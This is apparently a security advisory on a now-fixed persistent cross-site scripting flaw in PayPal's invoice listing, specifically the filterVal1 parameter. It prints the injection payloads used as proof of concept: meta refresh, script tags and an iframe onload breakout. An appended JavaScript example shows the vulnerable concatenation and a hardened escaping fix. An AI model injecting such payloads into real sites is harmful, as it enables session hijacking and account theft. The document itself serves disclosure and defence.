The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official PayPal e-commerce website content management system.
The bug allows remote attackers to inject malicious script code on the application side (persistent). The persistent vulnerability is located in the "Artikel pro Seite" (items per page) listing module, in the bound filterVal1 parameter.
Remote exploitation requires low user interaction; local exploitation requires a privileged application user account. Successful exploitation of the vulnerability can lead to session hijacking (admin), account theft via persistent web attack, or stable (persistent) context manipulation.
Proof of Concept:
=================
The persistent vulnerability can be exploited by remote attackers and by local privileged user accounts with low required user interaction.
For demonstration or to reproduce ...
Review: [ALL Listing] (index) Rechnungen Verwalten - Geld Anfordern > Artikel pro Seite (Listing) > filterVal1
var currencyVals = ["EUR", "AUD", "BRL", "GBP", "DKK", "HKD", "ILS", "JPY", "CAD", "MXN", "TWD", "NZD", "NOK", "PHP",
"PLN", "SEK", "CHF", "SGD", "THB", "CZK", "HUF", "USD", ""];
var txt1 = "zwischen";
var txt2 = " und ";
var txtLabel = "Wert 2";
var advFilter = "email";
var dateFilter = "invoice_date";
var filterVal1 = "<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;"> <META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>document.cookie=true</script>"> <script>document.cookie=true;</script>
PoC: "><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <
The security risk of the persistent script code injection vulnerability is estimated as medium(+). The vulnerability has been fixed by PayPal.
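The pattern behind this finding, as an added example that is not PayPal's code or the advisory's own: a filter value is written into the page as a JavaScript string literal without escaping, shown beside a hardened renderer that escapes it before it lands inside the literal. The two renderers, the sample value and the example.invalid host are assumptions made for the example.

```javascript
// Escape a string so it is safe inside a double-quoted JavaScript string
// literal that itself sits inside an HTML <script> element. Everything that
// could close the literal or the script element is emitted as \uXXXX.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 ,._-]/g, (ch) => {
    const hex = ch.charCodeAt(0).toString(16).toUpperCase().padStart(4, "0");
    return "\\u" + hex;
  });
}

// Vulnerable pattern (hypothetical reconstruction): the raw filter value is
// concatenated straight into the script body.
function renderVulnerable(filterVal1) {
  return '<script>\nvar filterVal1 = "' + filterVal1 + '";\n</script>';
}

// Hardened form: the value is escaped before it lands inside the literal.
function renderHardened(filterVal1) {
  return '<script>\nvar filterVal1 = "' + escapeForJsString(filterVal1) + '";\n</script>';
}

// The HTML parser closes the <script> element at the first "</script" and
// treats any "<" from the value as markup once the literal is broken. A safe
// rendering therefore contains exactly the two "<" of its own tags.
function countTagOpeners(html) {
  return (html.match(/</g) || []).length;
}

// Evaluate the hardened script body to confirm the original value survives.
function recoverValue(html) {
  const body = html.replace(/^<script>\n/, "").replace(/\n<\/script>$/, "");
  return new Function(body + " return filterVal1;")();
}

// Constructed sample in the shape of the advisory's PoC, not the page's payload.
const SAMPLE = '"><iframe src=http://example.invalid onload=alert(1)>';

function demo() {
  const bad = renderVulnerable(SAMPLE);
  const good = renderHardened(SAMPLE);
  return {
    vulnerableBreaksOut: countTagOpeners(bad) > 2,
    hardenedStaysInLiteral: countTagOpeners(good) === 2,
    roundTrip: recoverValue(good) === SAMPLE,
  };
}

if (typeof require !== "undefined" && require.main === module) console.log(demo());
```

Escaping for the JavaScript-string context is what keeps a value like this inside `filterVal1`; HTML-entity encoding alone would not, because the script element is not entity-decoded.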